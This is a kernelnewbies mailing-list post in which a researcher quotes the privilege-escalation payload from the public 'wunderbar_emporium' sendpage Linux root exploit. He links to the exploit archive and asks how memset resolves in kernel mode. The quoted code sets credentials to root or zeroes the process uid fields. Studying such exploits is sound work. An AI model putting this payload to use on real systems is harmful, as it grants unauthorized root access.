An exploit about sendpage: http://www.securityfocus.com/data/vulnerabilities/exploits/wunderbar_emporium.tgz I read the exploit code, having some question? --------------------------------------------------------------------------------------- There is some code: static void give_it_to_me_any_way_you_can(void) { if (commit_creds && prepare_kernel_cred) { commit_creds(prepare_kernel_cred(0)); got_root = 1; } else { unsigned int *current; unsigned long orig_current; unsigned long orig_current_4k = 0; if (sizeof(unsigned long) != sizeof(unsigned int)) orig_current = get_current_x64(); else { orig_current = orig_current_4k = get_current_4k(); if (orig_current == 0) orig_current = get_current_8k(); } repeat: current = (unsigned int *)orig_current; while (((unsigned long)current < (orig_current + 0x1000 - 17 )) && (current[0] != our_uid || current[1] != our_uid || current[2] != our_uid || current[3] != our_uid)) current++; if ((unsigned long)current >= (orig_current + 0x1000 - 17 )) { if (orig_current == orig_current_4k) { orig_current = get_current_8k(); goto repeat; } return; } got_root = 1; memset(current, 0, sizeof(unsigned int) * 8); } return; } static int __attribute__((regparm(3))) own_the_kernel(unsigned long a, unsigned long b, unsigned long c, unsigned long d, unsigned long e) { ...... // push it real good give_it_to_me_any_way_you_can(); return -1; } ------------------------------------------------------------------------------------------- own_the_kernel() will run in kernel mode, when trigger the bug in user mode. BUT give_it_to_me_any_way_you_can() call memset(), memset() is a function in glic. In Kernel mode, can Call function in glib? How to resolve the symbol? -- Best Regards :-) ------------------------------------------- Wang Yao(王耀),wangyao@xxxxxxxxxxxxx ipconfigme@xxxxxxxxx HomePage: http://cudev.cublog.cn Research Center of Computer Network and Information Security Technology Harbin Institute Of Technology Address:NO.92 West Da-Zhi Street,NanGang District,Harbin,Heilongjiang -- To unsubscribe from this list: send an email with "unsubscribe kernelnewbies" to ecartis@xxxxxxxxxxxx Please read the FAQ at http://kernelnewbies.org/FAQ
